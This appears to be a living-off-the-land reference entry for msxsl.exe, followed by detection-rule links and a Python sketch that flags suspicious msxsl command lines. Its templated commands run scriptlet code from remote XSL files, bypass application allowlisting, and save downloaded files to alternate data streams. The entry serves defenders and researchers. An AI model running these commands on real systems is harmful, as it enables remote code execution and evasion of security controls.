msxsl.exe
Command line utility used to perform XSL transformations.
Paths
no default
Commands
Execute
Run COM Scriptlet code within the script.xsl file (local).
Use case: Local execution of script stored in XSL file.
Privileges: User
msxsl.exe {PATH:.xml} {PATH:.xsl}
AWL Bypass
Run COM Scriptlet code within the script.xsl file (local).
Use case: Local execution of script stored in XSL file.
Privileges: User
msxsl.exe {PATH:.xml} {PATH:.xsl}
Execute
Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
Use case: Local execution of a remote XSL script that is stored as an XML file.
Privileges: User
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl}
AWL Bypass
Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
Use case: Local execution of a remote XSL script that is stored as an XML file.
Privileges: User
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml}
Download
Using remote XML and XSL files, save the transformed XML file to disk.
Use case: Download a file from the internet and save it to disk.
Privileges: User
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}
ADS
Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS).
Use case: Download a file from the internet and save it to an NTFS Alternate Data Stream.
Privileges: User
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-name
Detection
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
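A triage sketch for the command shapes listed above, added here as an example and not taken from LOLBAS or the linked rules. It assumes process-creation events exposed as dictionaries with `Image` and `CommandLine` fields (Sysmon Event ID 1 naming); the sample events and the finding labels are constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

URL_RE = re.compile(r"^(?:https?|ftp)://", re.I)

def split_args(command_line):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in re.finditer(r'"([^"]*)"|(\S+)', command_line)]

def is_ads_target(target):
    """True when the -o target names a stream (file:stream), ignoring a drive letter."""
    rest = target[2:] if re.match(r"^[A-Za-z]:", target) else target
    return ":" in rest

def classify_msxsl(event):
    """Return the set of findings (labels are this example's own) for one event."""
    # Matches on file name only; a renamed copy of the binary is not caught here.
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    if image != "msxsl.exe":
        return set()
    args = split_args(event.get("CommandLine", ""))[1:]
    findings = {"execute"}  # the tool has no default path, so any run merits review
    # The first two arguments are the XML source and the stylesheet.
    if any(URL_RE.match(a) for a in args[:2]):
        findings.add("remote_input")
    for flag, target in zip(args, args[1:]):
        if flag.lower() == "-o":
            findings.add("ads_output" if is_ads_target(target) else "file_output")
    return findings

# Constructed sample events, one per command shape on this page plus a benign process.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\u\Downloads\msxsl.exe",
     "CommandLine": r"msxsl.exe data.xml script.xsl"},
    {"Image": r"C:\Users\u\Downloads\msxsl.exe",
     "CommandLine": r"msxsl.exe https://example.test/a.xml https://example.test/a.xsl -o C:\Temp\out.txt"},
    {"Image": r"C:\Users\u\Downloads\msxsl.exe",
     "CommandLine": r'"C:\Users\u\Downloads\msxsl.exe" https://example.test/a.xml https://example.test/a.xsl -o C:\Temp\notes.txt:ads-name'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe a.txt"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(sorted(classify_msxsl(ev)), "<-", ev["CommandLine"])
```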